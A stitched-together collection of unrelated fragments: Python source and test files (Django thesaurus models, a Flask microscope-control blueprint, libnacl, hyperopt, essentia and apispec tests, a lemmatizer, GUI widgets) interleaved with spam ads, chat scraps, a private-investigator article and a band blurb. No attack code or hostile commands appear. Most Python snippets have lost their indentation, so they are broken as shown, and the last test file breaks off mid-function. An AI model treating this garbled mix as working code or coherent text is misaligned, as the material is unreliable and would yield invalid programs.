# -*- coding: UTF-8 -*-
#
# Copyright 2013 Leandro Regueiro
#
# This file is part of Thesaurus-editor.
#
# Thesaurus-editor is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# Thesaurus-editor is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# Thesaurus-editor. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
#class Language(models.Model):
# iso_code = models.CharField(primary_key=True, max_length=10)
# name = models.CharField(max_length=50)
#
# def __unicode__(self):
# return u"%(iso_code)s" % self.iso_code
#class Thesaurus(models.Model):
# name = models.CharField(primary_key=True, max_length=50)
# language = models.ForeignKey(Language, null=True, on_delete=models.SET_NULL)
#
# def __unicode__(self):
# return self.name
class Word(models.Model):
word = models.CharField(primary_key=True, max_length=100)
finalized = models.BooleanField(default=False)
#thesaurus = models.ForeignKey(Thesaurus)
class Meta:
ordering = ['word']
        #unique_together = ("word", "thesaurus")  # TODO: if uncommenting this, remove primary_key=True from the word field.
def __unicode__(self):
return self.word
def _retrieve_list(self, relationship_type):
relationship_list = []
for relationship in self.relationship_set.filter(relationship_type=relationship_type):
            #TODO export the relationship objects too, since it is necessary for getting the part of speech.
            #TODO export the relationship intermediary table, since it is necessary for getting the notes.
relationship_list.append({"pk": relationship.pk,
"pos": relationship.pos,
"words": relationship.words.exclude(word=self)})
return relationship_list
def retrieve_synonyms(self):
return self._retrieve_list("S")
def retrieve_antonyms(self):
return self._retrieve_list("A")
def retrieve_hypernyms(self):
return self._retrieve_list("H")
#def next_word(self):
# return
class Relationship(models.Model):
RELATIONSHIP_CHOICES = (
(u'S', u'Synonym'),
(u'A', u'Antonym'),
(u'H', u'Hypernym'),
)
relationship_type = models.CharField(max_length=2, choices=RELATIONSHIP_CHOICES)
words = models.ManyToManyField(Word, through='WordsForRelationship')
    pos = models.CharField(max_length=20, null=True, blank=True, default="")  # part of speech
def __unicode__(self):
return u"%(type)s: %(words)s" % {"type": self.get_relationship_type_display(), "words": self.words.all()}
class WordsForRelationship(models.Model):
relationship = models.ForeignKey(Relationship)
word = models.ForeignKey(Word)
    note = models.CharField(max_length=20, null=True, blank=True, default="")  # e.g. "(generic word)" or similar
class Meta:
unique_together = ("relationship", "word")
def __unicode__(self):
return u"%(word)s --> %(relationship)s" % {"word": self.word, "relationship": self.relationship}
|
Here at True Concrete Siding, we're here to meet your standards for Concrete Siding in Canaan, VT. Our crew of highly trained contractors will give you the services you need with the most sophisticated solutions around. We make certain that you receive the very best service, the best price, and the highest quality supplies. Call 888-603-5512 to get started.
Here at True Concrete Siding, we know that you want to stay within budget and cut costs wherever you can. You still need quality work for Concrete Siding in Canaan, VT, and you can rely on our team to save you money while still delivering top quality work. Our efforts to save you money will never compromise the quality of our results. Our objective is to ensure that you get the best supplies and a result that endures through the years. This is possible because we know how to save you time and money on materials and labor. Save time and money by getting in touch with True Concrete Siding now. We're waiting to take your call at 888-603-5512.
Concrete Siding is available in Canaan, VT.
When you're considering Concrete Siding in Canaan, VT, you need to be well informed to make the best choices. You shouldn't go into it without understanding it properly, and you should know what to expect. You won't encounter any unexpected surprises when you deal with True Concrete Siding. Start by dialing 888-603-5512 to talk about your project. We will answer all of your questions and arrange the first meeting. We will work with you throughout the whole project, and our crew will show up on time and prepared.
Plenty of good reasons exist to choose True Concrete Siding for Concrete Siding in Canaan, VT. We're the first choice when you need the most effective cost-saving options, the finest equipment, and the highest standard of customer satisfaction. Our company is ready to help you with the greatest experience and competence around. Whenever you need Concrete Siding in Canaan, contact True Concrete Siding by dialing 888-603-5512, and we'll be pleased to help. |
"""
mm_app_core.py
~~~~~~~~~~~~~~
This module supports accessing image acquisition functionality, similar to the
main Micro-Manager dialog.
:copyright: (c) 2012 by Albert Boehmler
:license: GNU Affero General Public License, see LICENSE for more details.
"""
import sys, os, time, thread
from flask import Blueprint, render_template, abort, url_for, redirect, request
from pylab import imsave, cm
import MMCorePy
from settings import mm_core as mmc
import settings
import configurations
import mm_util
mm_app_core = Blueprint('mm_app_core', __name__,
template_folder='templates')
@mm_app_core.route('/')
def index():
return render_template('acquisition.html',
mm_app_core=sys.modules[__name__],
configurations=configurations._get_configs_listing())
def get_allowed_binning_values():
return mmc.getAllowedPropertyValues(mmc.getCameraDevice(),
MMCorePy.g_Keyword_Binning)
def get_available_shutters():
return mmc.getLoadedDevicesOfType(MMCorePy.ShutterDevice)
@mm_app_core.route('/binning/')
def get_binning():
return mmc.getProperty(mmc.getCameraDevice(),
MMCorePy.g_Keyword_Binning)
@mm_app_core.route('/binning/', methods=['POST'])
def set_binning():
binning_value = int(request.form['binning'])
return _set_binning(binning_value)
@mm_app_core.route('/shutter/')
def get_shutter():
return mmc.getShutterDevice()
@mm_app_core.route('/exposure/')
def get_exposure():
return mmc.getExposure()
@mm_app_core.route('/exposure/', methods=['POST'])
def set_exposure():
exposure_value = float(request.form['exposure'])
return _set_exposure(exposure_value)
@mm_app_core.route('/auto-shutter/')
def get_auto_shutter():
return mmc.getAutoShutter()
@mm_app_core.route('/auto-shutter/', methods=['POST'])
def set_auto_shutter():
auto_shutter_value = mm_util.from_js_boolean(request.form['auto-shutter'])
return _set_auto_shutter(auto_shutter_value)
@mm_app_core.route('/open-shutter/')
def get_shutter_open():
return mmc.getShutterOpen()
@mm_app_core.route('/open-shutter/', methods=['POST'])
def set_shutter_open():
open_shutter_value = mm_util.from_js_boolean(request.form['open-shutter'])
return _set_shutter_open(open_shutter_value)
@mm_app_core.route('/active-shutter/')
def get_active_shutter():
return mmc.getShutter()
@mm_app_core.route('/active-shutter/', methods=['POST'])
def set_active_shutter():
active_shutter_value = str(request.form['active-shutter'])
return _set_active_shutter(active_shutter_value)
@mm_app_core.route('/snap-image/')
def snap_image():
image_name = _snap_image()
return render_template('snap-image.html',
img_url=url_for('acq.download_acquired_image',
image_name=image_name))
def _is_camera_available():
    return mmc.getCameraDevice() is not None
def _set_binning(binning_value):
    if _is_camera_available():
mmc.setProperty(mmc.getCameraDevice(),
MMCorePy.g_Keyword_Binning,
binning_value)
return mmc.getProperty(mmc.getCameraDevice(),
MMCorePy.g_Keyword_Binning)
def _set_exposure(exposure_value):
mmc.setExposure(exposure_value)
return str(mmc.getExposure())
def _set_auto_shutter(auto_shutter_value):
mmc.setAutoShutter(auto_shutter_value)
return str(mmc.getAutoShutter())
def _set_shutter_open(shutter_open_value):
    mmc.setShutterOpen(shutter_open_value)
return str(mmc.getShutterOpen())
def _set_active_shutter(active_shutter_value):
    mmc.setShutterDevice(active_shutter_value)
    return mmc.getShutterDevice()
def _snap_image():
image_name = "acq-%s.png" % int(time.time() * 1000)
save_location = os.path.join(settings.MM_ANYWHERE_HOST_DATA_PATH,
image_name)
camera = ""
## thread.start_new_thread(_execute_snap_image, (camera, save_location))
## time.sleep(0.1)
_execute_snap_image(camera, save_location)
return image_name
def _execute_snap_image(camera, save_location):
mmc.snapImage()
mmc.waitForSystem()
img = mmc.getImage()
    imsave(save_location, img, cmap=cm.gray)
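# Illustrative sketch (an assumption, not part of the original module): the
# blueprint above would typically be registered on a Flask application, e.g.
#
#   from flask import Flask
#   from mm_app_core import mm_app_core
#
#   app = Flask(__name__)
#   app.register_blueprint(mm_app_core, url_prefix='/acquisition')
#   app.run()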
|
You broke the game, -Requiem. 'C' is the letter you're looking for.
"Dead Wrong" - The Notorious B.I.G.
Where can I watch Kuzu no honkai live action?
I come from a long line of quasi-lesbian ghost killers!
I'll fix things. Gimme a sec. |
"""
Basic tests for randombytes_* functions
"""
import libnacl
import unittest
class TestRandomBytes(unittest.TestCase):
def test_randombytes_random(self):
self.assertIsInstance(libnacl.randombytes_random(), int)
def test_randombytes_uniform(self):
self.assertIsInstance(libnacl.randombytes_uniform(200), int)
freq = {libnacl.randombytes_uniform(256): 1 for _ in range(65536)}
self.assertEqual(256, len(freq))
self.assertTrue(all(freq.values()))
def test_randombytes(self):
'copied from libsodium default/randombytes.c'
data = libnacl.randombytes(65536)
freq = {x: 1 for x in data}
self.assertEqual(256, len(freq))
self.assertTrue(all(freq.values()))
def test_randombytes_buf_deterministic(self):
seed = libnacl.randombytes_buf(32)
seed2 = libnacl.randombytes_buf(32)
data = libnacl.randombytes_buf_deterministic(32, seed)
data2 = libnacl.randombytes_buf_deterministic(32, seed)
data3 = libnacl.randombytes_buf_deterministic(32, seed2)
        self.assertEqual(32, len(data))
        self.assertEqual(32, len(data2))
        self.assertEqual(32, len(data3))
self.assertEqual(data, data2)
self.assertNotEqual(data, data3)
def test_crypto_kdf_keygen(self):
master_key = libnacl.crypto_kdf_keygen()
freq = {x: 1 for x in master_key}
self.assertEqual(32, len(master_key))
self.assertTrue(all(freq.values()))
def test_crypto_kdf_derive_from_key(self):
master_key = libnacl.crypto_kdf_keygen()
subkey = libnacl.crypto_kdf_derive_from_key(16, 1, "Examples", master_key)
subkey2 = libnacl.crypto_kdf_derive_from_key(16, 1, "Examples", master_key)
subkey3 = libnacl.crypto_kdf_derive_from_key(16, 2, "Examples", master_key)
self.assertEqual(16, len(subkey))
self.assertEqual(16, len(subkey2))
self.assertEqual(16, len(subkey3))
self.assertEqual(subkey, subkey2)
self.assertNotEqual(subkey, subkey3)
def test_crypto_kx_keypair(self):
pk, sk = libnacl.crypto_kx_keypair()
self.assertEqual(32, len(pk))
self.assertEqual(32, len(sk))
def test_crypto_kx_seed_keypair(self):
seed = libnacl.randombytes_buf(32)
seed2 = libnacl.randombytes_buf(32)
pk, sk = libnacl.crypto_kx_seed_keypair(seed)
pk2, sk2 = libnacl.crypto_kx_seed_keypair(seed)
pk3, sk3 = libnacl.crypto_kx_seed_keypair(seed2)
self.assertEqual(pk, pk2)
self.assertNotEqual(pk, pk3)
self.assertEqual(sk, sk2)
self.assertNotEqual(sk, sk3)
def test_crypto_kx_client_session_keys(self):
client_pk, client_sk = libnacl.crypto_kx_keypair()
server_pk, server_sk = libnacl.crypto_kx_keypair()
rx, tx, status = libnacl.crypto_kx_client_session_keys(client_pk, client_sk, server_pk)
rx2, tx2, status = libnacl.crypto_kx_client_session_keys(client_pk, client_sk, server_pk)
self.assertEqual(32, len(rx))
self.assertEqual(32, len(tx))
self.assertEqual(rx, rx2)
self.assertEqual(tx, tx2)
def test_crypto_kx_server_session_keys(self):
client_pk, client_sk = libnacl.crypto_kx_keypair()
server_pk, server_sk = libnacl.crypto_kx_keypair()
        rx, tx, status = libnacl.crypto_kx_server_session_keys(server_pk, server_sk, client_pk)
        rx2, tx2, status = libnacl.crypto_kx_server_session_keys(server_pk, server_sk, client_pk)
self.assertEqual(32, len(rx))
self.assertEqual(32, len(tx))
self.assertEqual(rx, rx2)
self.assertEqual(tx, tx2)
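    def test_crypto_kx_session_key_symmetry(self):
        # Illustrative addition (a sketch, assuming the libsodium kx
        # convention used above: each side passes its own keypair plus the
        # peer's public key). The client's receive key should equal the
        # server's transmit key, and vice versa.
        client_pk, client_sk = libnacl.crypto_kx_keypair()
        server_pk, server_sk = libnacl.crypto_kx_keypair()
        crx, ctx, _ = libnacl.crypto_kx_client_session_keys(client_pk, client_sk, server_pk)
        srx, stx, _ = libnacl.crypto_kx_server_session_keys(server_pk, server_sk, client_pk)
        self.assertEqual(crx, stx)
        self.assertEqual(ctx, srx)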
|
Widest selection of Self Military, in stock and fast shipping, the most exclusive collection of Self Military from Ebay!
4in1 Self Defense Military Grade Stun Gun Rechargeable Flashlight Hidden Dagger!
CALVIN KLEIN New WT Elegant Dress Denim Military Style Self Belt size 4 LK! |
"""
Django settings for example_project project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '%sog7c%&7^pk5+v@4@2^+s$5r45wzkxe@^)9ki0ik#k+!sa8_&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'example_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'example_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
|
Ask any random stranger if they are reasonable, and almost all will either tell you they are reasonable or at the very least will jokingly tell you they aren’t via some cliché line about how their therapist says they are. Unfortunately, I do not think any of us are as reasonable as we think we are.
|
import numpy as np
import hyperopt.criteria as crit
def test_ei():
rng = np.random.RandomState(123)
for mean, var in [(0, 1), (-4, 9)]:
thresholds = np.arange(-5, 5, .25) * np.sqrt(var) + mean
v_n = [crit.EI_gaussian_empirical(mean, var, thresh, rng, 10000)
for thresh in thresholds]
v_a = [crit.EI_gaussian(mean, var, thresh)
for thresh in thresholds]
#import matplotlib.pyplot as plt
#plt.plot(thresholds, v_n)
#plt.plot(thresholds, v_a)
#plt.show()
if not np.allclose(v_n, v_a, atol=0.03, rtol=0.03):
for t, n, a in zip(thresholds, v_n, v_a):
                print(t, n, a, abs(n - a), abs(n - a) / (abs(n) + abs(a)))
assert 0
#mean, var, thresh, v_n, v_a)
def test_log_ei():
for mean, var in [(0, 1), (-4, 9)]:
thresholds = np.arange(-5, 30, .25) * np.sqrt(var) + mean
ei = np.asarray(
[crit.EI_gaussian(mean, var, thresh)
for thresh in thresholds])
nlei = np.asarray(
[crit.logEI_gaussian(mean, var, thresh)
for thresh in thresholds])
naive = np.log(ei)
#import matplotlib.pyplot as plt
#plt.plot(thresholds, ei, label='ei')
#plt.plot(thresholds, nlei, label='nlei')
#plt.plot(thresholds, naive, label='naive')
#plt.legend()
#plt.show()
# -- assert that they match when the threshold isn't too high
assert np.allclose(nlei, naive)
def test_log_ei_range():
assert np.all(
np.isfinite(
[crit.logEI_gaussian(0, 1, thresh)
for thresh in [-500, 0, 50, 100, 500, 5000]]))
def test_ucb():
assert np.allclose(crit.UCB(0, 1, 1), 1)
assert np.allclose(crit.UCB(0, 1, 2), 2)
assert np.allclose(crit.UCB(0, 4, 1), 2)
assert np.allclose(crit.UCB(1, 4, 1), 3)
# -- flake8
|
Floral scents have the ability to calm and add clarity to your day, and this season there is a bounty of florals, laden with peony and rose. Easy to wear and ageless, what's special about this season's line-up is the woody dry-down, a combination that helps balance hormones, relieve anxiety, and even increase libido. Here are my picks for the season ahead.
The latest floral scents laden with rose.
B. Balenciaga Skin, 50ml, $170. Bottega Veneta Knot Eau Florale Eau de Parfum, 50ml, $165. Giorgio Armani Si Absolu de Rose, 100ml, $195. Elie Saab Le Parfum Rose Couture, 30ml, $102. Diptyque Eau Rose Eau de Toilette, 50ml, $160. TOCCA Isabel Eau de Parfum, 30ml, $124. Narciso Eau de Parfum Poudrée, 30ml, $118. |
#!/usr/bin/env python
import sys
import re
from util import *
##
## reformat lemmatizer output from different lemmatizers
## output format: one sentence per line, tokens joined as word_pos_lemma
## (or word_lemma when no POS is available)
##
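##
## illustrative example for treetagger input ("word<TAB>pos<TAB>lemma", one
## token per line, blank line between sentences); the two-token sentence
##   Dogs  NNS  dog
##   bark  VBP  bark
## comes out as the single line: Dogs_NNS_dog bark_VBP_bark
##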
if len(sys.argv) != 2:
print "usage: lemma_reformat.py [treetagger|freeling|morce|morph] < input > output"
sys.exit(-1)
if sys.argv[1] in "treetagger freeling morce morph".split():
tagger = sys.argv[1]
else:
print "Error: unknown lemmatizer: ", sys.argv[1]
sys.exit(-1)
# POS/lemma separator
sep = "_"
if tagger == 'morce':
for paragraph in paragraphs(sys.stdin, separator=lambda x:x.strip()=="<s>", includeEmpty=False):
if paragraph.startswith("<csts>"):
continue
for line in paragraph.split("\n"):
line = line.decode("utf8", "replace")
if not line.startswith("<f") or line.startswith("<d"):
continue
try:
re_word = re.search(">.*?<", line)
word = re_word.group(0)[1:-1]
re_pos = re.search("MDt.*?>.", line)
pos = re_pos.group(0)[-1]
re_lem = re.search("(<MDl.*?>)([^<]*)(<)", line)
lem = re_lem.group(2)
if lem.find("-") > 0:
lem = lem[:lem.find("-")]
if lem.find("_") > 0:
lem = lem[:lem.find("_")]
            except:
                print "Warning: no lemma found: %s" % line.encode("utf8", "replace")
                continue
# lowercase lemma
lem = lem.lower()
print "%s%s%s%s%s" % (word.encode("utf8", "replace"), sep, pos.encode("utf8", "replace"), sep, lem.encode("utf8")),
print""
elif tagger == 'morph':
while True:
line = sys.stdin.readline()
if line == '':
break
line = line.decode("utf8", "replace")
tokens = line.split()
if tokens == []:
continue
for token in tokens:
sep1 = token.find('_')
sep2 = token.find('_', sep1+1)
if sep2 < 0:
lem = token[:sep1].lower()
print "%s%s%s" % (token.encode("utf8", "replace"), sep, lem.encode("utf8", "replace")),
else:
                word_pos = token[:sep2]
lem = token[sep2+1:].lower()
print "%s%s%s" % (word_pos.encode("utf8", "replace"), sep, lem.encode("utf8", "replace")),
print ""
sys.stdout.flush()
else:
for paragraph in paragraphs(sys.stdin, includeEmpty=False):
for line in paragraph.split("\n"):
line = line.decode("utf8", "replace")
tokens = line.split()
if len(tokens) < 3: # skip 'other' stuff like xml markup
continue
if tagger == 'treetagger':
word, pos, lem = tokens
if lem == "<unknown>":
lem = word
else: # tagger == "freeling"
word, lem, pos = tokens[:3]
# lowercase lemma
lem = lem.lower()
print "%s%s%s%s%s" % (word.encode("utf8", "replace"), sep, pos.encode("utf8", "replace"), sep, lem.encode("utf8")),
print""
|
Would you like to link to my Santa Barbara real estate web site? By filling out information about your web site below, I will be happy to cross link with you. Please use the code below in order to create the correct link to my real estate web site, and fill in information about yours. Thanks and any and all referrals are greatly appreciated. |
#!/usr/bin/env python
# Copyright (C) 2006-2016 Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/
from essentia_test import *
import numpy
class TestEnvelope(TestCase):
def testFile(self):
        filename = join(testdata.audio_dir, 'generated', 'synthesised', 'sin_pattern_decreasing.wav')
audioLeft = MonoLoader(filename=filename, downmix='left', sampleRate=44100)()
envelope = Envelope(sampleRate=44100, attackTime=5, releaseTime=100)(audioLeft)
for x in envelope:
self.assertValidNumber(x)
def testEmpty(self):
self.assertEqualVector(Envelope()([]), [])
def testZero(self):
input = [0]*100000
envelope = Envelope(sampleRate=44100, attackTime=5, releaseTime=100)(input)
self.assertEqualVector(envelope, input)
def testOne(self):
input = [-0.5]
envelope = Envelope(sampleRate=44100, attackTime=0, releaseTime=100, applyRectification=True)(input)
self.assertEqual(envelope[0], -input[0])
def testInvalidParam(self):
self.assertConfigureFails(Envelope(), { 'sampleRate': 0 })
self.assertConfigureFails(Envelope(), { 'attackTime': -10 })
self.assertConfigureFails(Envelope(), { 'releaseTime': -10 })
suite = allTests(TestEnvelope)
if __name__ == '__main__':
TextTestRunner(verbosity=2).run(suite)
|
An investigation agency in the south of England has been inundated with new customers. This is the result of a television programme about infidelity and cheating partners, which gave a checklist of things to look out for in a cheating partner. Every new client who called confessed that they had watched the programme and that it had made them suspicious of their spouse.
The programme has also had a knock-on effect on the investigators: more work means more staff. Luckily for the investigation business, they have an in-house training scheme and were able to get by on the staff they already employed. Most reputable investigation firms only hire operatives who come from either a police background or a special forces background, but if an individual decides to take up detective work there are qualifications available and plenty of advice across the board.
There does appear to be a mixed opinion about private detectives and private investigators in the UK. They are not as well known as in the USA, where they are much more a part of the culture and there is a more familiar feel about them. Many people who call a private detective agency or a private investigation agency in the UK have very rarely done so before. There is an opinion that such an agency offers a romantic, almost futuristic service: people imagine agencies using space-age gadgets and doing the impossible, while others believe that private detectives and investigators are above the law and quite at home breaking it. In truth, the job of a private investigator or a private detective is very hard work, with many long hours in the dark and the cold, striving to stay within the law while doing the best possible job. |
# GNU Enterprise Forms - wx 2.6 UI Driver - MenuItem widget
#
# Copyright 2001-2007 Free Software Foundation
#
# This file is part of GNU Enterprise
#
# GNU Enterprise is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either
# version 2, or (at your option) any later version.
#
# GNU Enterprise is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with program; see the file COPYING. If not,
# write to the Free Software Foundation, Inc., 59 Temple Place
# - Suite 330, Boston, MA 02111-1307, USA.
#
# $Id: menuitem.py,v 1.5 2011/07/01 20:08:23 oleg Exp $
from src.gnue.forms.uidrivers.java.widgets._base import UIWidget
from src.gnue.forms.uidrivers.java.widgets._remote import MenuItem
# =============================================================================
# Wrap a UI layer around a wxMenu widget
# =============================================================================
class UIMenuItem(UIWidget):
"""
Implements a menu item object.
"""
# -------------------------------------------------------------------------
# Create a menu item widget
# -------------------------------------------------------------------------
def _create_widget_(self, event):
"""
Creates a new MenuItem widget.
"""
if event.container:
# These are the relevant parameters
#hotkey = self._gfObject.hotkey
if self._gfObject.label is not None:
# it may be (table, tree) or frame
#uiWidget = self._gfObject.getActionSource().uiWidget
#if uiWidget._type == 'UIForm':
# actionSourceWidget = uiWidget.main_window
#else:
# actionSourceWidget = uiWidget.widget
#assert actionSourceWidget
#actionSourceWidget.Bind(wx.EVT_MENU, self.__on_menu, widget)
widget = MenuItem(self,
self._gfObject.label, # label
self._uiDriver.getStaticResourceWebPath(
self._gfObject._get_icon_file(size="16x16", format="png")
) or '', # icon file name
self._gfObject.action_off is not None, # is checkbox
)
event.container.uiAddMenu(widget)
else:
widget = None
event.container.uiAddSeparator()
self.widget = widget
# -------------------------------------------------------------------------
# Events
# -------------------------------------------------------------------------
def onMenu(self, remoteWidget):
self._gfObject._event_fire()
# -------------------------------------------------------------------------
# Check/uncheck menu item
# -------------------------------------------------------------------------
def _ui_switch_on_(self):
if self.widget is not None:
self.widget.uiCheck(True)
# -------------------------------------------------------------------------
def _ui_switch_off_(self):
if self.widget is not None:
self.widget.uiCheck(False)
# -------------------------------------------------------------------------
# Enable/disable menu item
# -------------------------------------------------------------------------
def _ui_enable_(self, enabled):
if self.widget is not None:
self.widget.uiEnable(enabled)
#def getId(self):
# return self.widget.GetId()
# =============================================================================
# Configuration data
# =============================================================================
configuration = {
'baseClass': UIMenuItem,
'provides' : 'GFMenuItem',
'container': False
}
|
Originally a metalcore band known as Operation Guillotine. Their debut album White Noise peaked at number 6 on the US Alternative charts.
They went on their first headlining tour from May to June 2016. They played Lollapalooza for the first time that year. |
#!/usr/bin/env python
# THIS FILE IS PART OF THE CYLC SUITE ENGINE.
# Copyright (C) 2008-2018 NIWA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gtk
from cylc.gui.gcapture import Gcapture
from cylc.gui.warning_dialog import warning_dialog
def graph_suite_popup(reg, cmd_help, defstartc, defstopc, graph_opts,
gcapture_windows, tmpdir, template_opts,
parent_window=None):
"""Popup a dialog to allow a user to configure their suite graphing."""
try:
import xdot
except ImportError as exc:
warning_dialog(str(exc) + "\nGraphing disabled.", parent_window).warn()
return False
window = gtk.Window()
window.set_border_width(5)
window.set_title("cylc graph " + reg)
window.set_transient_for(parent_window)
window.set_type_hint(gtk.gdk.WINDOW_TYPE_HINT_DIALOG)
vbox = gtk.VBox()
label = gtk.Label("[START]: ")
start_entry = gtk.Entry()
start_entry.set_max_length(14)
if defstartc:
start_entry.set_text(str(defstartc))
ic_hbox = gtk.HBox()
ic_hbox.pack_start(label)
ic_hbox.pack_start(start_entry, True)
vbox.pack_start(ic_hbox)
label = gtk.Label("[STOP]:")
stop_entry = gtk.Entry()
stop_entry.set_max_length(14)
if defstopc:
stop_entry.set_text(str(defstopc))
fc_hbox = gtk.HBox()
fc_hbox.pack_start(label)
fc_hbox.pack_start(stop_entry, True)
vbox.pack_start(fc_hbox, True)
cancel_button = gtk.Button("_Close")
cancel_button.connect("clicked", lambda x: window.destroy())
ok_button = gtk.Button("_Graph")
ok_button.connect("clicked", lambda w: graph_suite(
reg,
start_entry.get_text(),
stop_entry.get_text(),
graph_opts, gcapture_windows,
tmpdir, template_opts, parent_window))
help_button = gtk.Button("_Help")
help_button.connect("clicked", cmd_help, '', 'graph')
hbox = gtk.HBox()
hbox.pack_start(ok_button, False)
hbox.pack_end(cancel_button, False)
hbox.pack_end(help_button, False)
vbox.pack_start(hbox)
window.add(vbox)
window.show_all()
def graph_suite(reg, start, stop, graph_opts,
gcapture_windows, tmpdir, template_opts, window=None):
"""Launch the cylc graph command with some options."""
options = graph_opts
options += ' ' + reg + ' ' + start + ' ' + stop
command = "cylc graph " + template_opts + " " + options
foo = Gcapture(command, tmpdir)
gcapture_windows.append(foo)
foo.run()
return False
|
Communication is everything! Please send us a message if you would like to share any positive or negative feedback, have any suggestions, want to become an author, want to work with us, or have any other comments. A simple hello is always welcome, too! |
import json
import pytest
from marshmallow.fields import Field, DateTime, Dict, String, Nested, List, TimeDelta
from marshmallow import Schema
from apispec import APISpec
from apispec.ext.marshmallow import MarshmallowPlugin
from apispec.ext.marshmallow import common
from apispec.exceptions import APISpecError
from .schemas import (
PetSchema,
AnalysisSchema,
RunSchema,
SelfReferencingSchema,
OrderedSchema,
PatternedObjectSchema,
DefaultValuesSchema,
AnalysisWithListSchema,
)
from .utils import get_schemas, get_parameters, get_responses, get_paths, build_ref
class TestDefinitionHelper:
@pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
def test_can_use_schema_as_definition(self, spec, schema):
spec.components.schema("Pet", schema=schema)
definitions = get_schemas(spec)
props = definitions["Pet"]["properties"]
assert props["id"]["type"] == "integer"
assert props["name"]["type"] == "string"
def test_schema_helper_without_schema(self, spec):
spec.components.schema("Pet", {"properties": {"key": {"type": "integer"}}})
definitions = get_schemas(spec)
assert definitions["Pet"]["properties"] == {"key": {"type": "integer"}}
@pytest.mark.parametrize("schema", [AnalysisSchema, AnalysisSchema()])
def test_resolve_schema_dict_auto_reference(self, schema):
def resolver(schema):
schema_cls = common.resolve_schema_cls(schema)
return schema_cls.__name__
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.raises(KeyError):
get_schemas(spec)
spec.components.schema("analysis", schema=schema)
spec.path(
"/test",
operations={
"get": {
"responses": {
"200": {"schema": build_ref(spec, "schema", "analysis")}
}
}
},
)
definitions = get_schemas(spec)
assert 3 == len(definitions)
assert "analysis" in definitions
assert "SampleSchema" in definitions
assert "RunSchema" in definitions
@pytest.mark.parametrize(
"schema", [AnalysisWithListSchema, AnalysisWithListSchema()]
)
def test_resolve_schema_dict_auto_reference_in_list(self, schema):
def resolver(schema):
schema_cls = common.resolve_schema_cls(schema)
return schema_cls.__name__
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.raises(KeyError):
get_schemas(spec)
